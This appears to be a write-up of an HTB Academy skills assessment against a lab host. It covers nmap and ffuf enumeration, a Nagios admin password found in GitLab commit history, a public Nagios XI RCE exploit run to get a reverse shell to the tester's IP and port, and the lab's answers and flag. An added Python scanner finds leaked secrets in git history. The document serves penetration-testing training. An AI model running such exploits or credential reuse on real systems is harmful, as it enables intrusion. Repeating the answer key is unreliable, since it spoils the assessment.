During an external penetration test for the company Inlanefreight, you come across a host that, at first glance, does not seem extremely interesting. At this point in the assessment, you have exhausted all options and hit several dead ends. Looking back through your enumeration notes, something catches your eye about this particular host. You also see a note that you don't recall about the gitlab.inlanefreight.local vhost.

Performing deeper and iterative enumeration reveals several serious flaws. Enumerate the target carefully and answer all the questions below to complete the second part of the skills assessment.

Questions:

What is the URL of the WordPress instance?

Reconnaissance

Nmap scan

┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ sudo nmap -sV -sC 10.129.201.90
[sudo] password for sasorirose: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 07:11 UTC
Nmap scan report for gitlab.inlanefreight.local (10.129.201.90)
Host is up (0.25s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
|   256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_  256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: skills2, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://gitlab.inlanefreight.local:8180/
|_http-server-header: Apache/2.4.41 (Ubuntu)
389/tcp  open  ldap     OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
| ssl-cert: Subject: commonName=10.129.201.90/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2021-09-02T01:49:48
|_Not valid after:  2031-08-31T01:49:48
| tls-alpn: 
|_  http/1.1
|_http-title:  Shipter\xE2\x80\x93Transport and Logistics HTML5 Template 
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.41 (Ubuntu)
8180/tcp open  http     nginx
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://gitlab.inlanefreight.local:8180/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search 
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/ 
|_/*/new /*/edit /*/raw
Service Info: Host:  skills2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.03 seconds


Enumerate for subdomains:

┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part2]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://10.129.201.90/ -H "Host: FUZZ.inlanefreight.local" -fs 46166 -s
blog
monitoring
gitlab

You can also run it without these options:

-fs filters out responses of a specific size

-s hides everything except the valid hits

Answer: http://blog.inlanefreight.local

What is the name of the public GitLab project?

After registering, logging in with the new credentials and browsing the public projects:

Answer: Virtualhost

What is the FQDN of the third vhost?

Answer: monitoring.inlanefreight.local

What application is running on this third vhost? (One word)

After accessing monitoring.inlanefreight.local:

Answer: Nagios

What is the admin password to access this application?

Go back to enumerating the GitLab instance and hunt for the admin password.

Enumerate for the Nagios PostgreSQL database.

And I found this in the commit history:

nagiosadmin:oilaKglm7M09@CPL&^lC

Let’s try to log in with that credential.

Answer: oilaKglm7M09@CPL&^lC
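
From the defender's side, the finding above is a credential that stayed readable in a repository's commit history. The following is an added example, not part of the original write-up: it scans `git log -p` output for literal secrets on both added and removed lines, and the sample log, key names and patterns are constructed assumptions.

```python
import re
# Constructed sample of `git log -p` output (not taken from the lab repository).
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222

    Remove hardcoded database password

diff --git a/config/db.conf b/config/db.conf
--- a/config/db.conf
+++ b/config/db.conf
@@ -1,2 +1,2 @@
 db_host = 127.0.0.1
-db_password = EXAMPLE-not-a-real-secret
+db_password = ${DB_PASSWORD}
commit 1111111111111111111111111111111111111111

    Add database config

diff --git a/config/db.conf b/config/db.conf
--- /dev/null
+++ b/config/db.conf
@@ -0,0 +1,2 @@
+db_host = 127.0.0.1
+db_password = EXAMPLE-not-a-real-secret
"""

# Key names that usually hold a secret, followed by a literal value (heuristic).
SECRET_RE = re.compile(
    r"(?i)\b[\w.-]*(?:password|passwd|secret|token|api_?key)[\w.-]*\s*[:=]\s*['\"]?([^\s'\"]+)")
# Values that reference the environment or a template, not a literal secret.
PLACEHOLDER_RE = re.compile(r"^(?:\$\{?\w+\}?|<[^>]+>|\{\{.*\}\})$")

def scan_patch_log(log_text):
    """Return (commit, file, sign, line) for each literal secret on a diff line."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:8]
        elif line.startswith(("+++ ", "--- ")):
            if not line.endswith("/dev/null"):
                path = line[6:]  # strip the "+++ b/" or "--- a/" prefix
        elif commit and line.startswith(("+", "-")):
            # A "-" line counts too: removing a secret does not erase it from history.
            m = SECRET_RE.search(line[1:])
            if m and not PLACEHOLDER_RE.match(m.group(1)):
                findings.append((commit, path, line[0], line[1:].strip()))
    return findings

if __name__ == "__main__":
    for finding in scan_patch_log(SAMPLE_LOG):
        print(finding)
```

On a real repository, feed the function the output of `git log -p --all`; any secret it reports has to be rotated, because a later commit that deletes the line leaves the old value in history.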

Obtain reverse shell access on the target and submit the contents of the flag.txt file.

Enumerate Nagios and search for a Nagios XI 5.7.X PoC; I found this: https://www.exploit-db.com/exploits/49422

python3 nagiosxi-rce.py http://monitoring.inlanefreight.local nagiosadmin 'oilaKglm7M09@CPL&^lC' 10.10.14.29 4444

Get a reverse shell with the exploit script.

After doing that, I think it is too complicated to get a shell on the host as another user, but we can find the flag here.

Answer: afe377683dce373ec2bf7eaf1e0107eb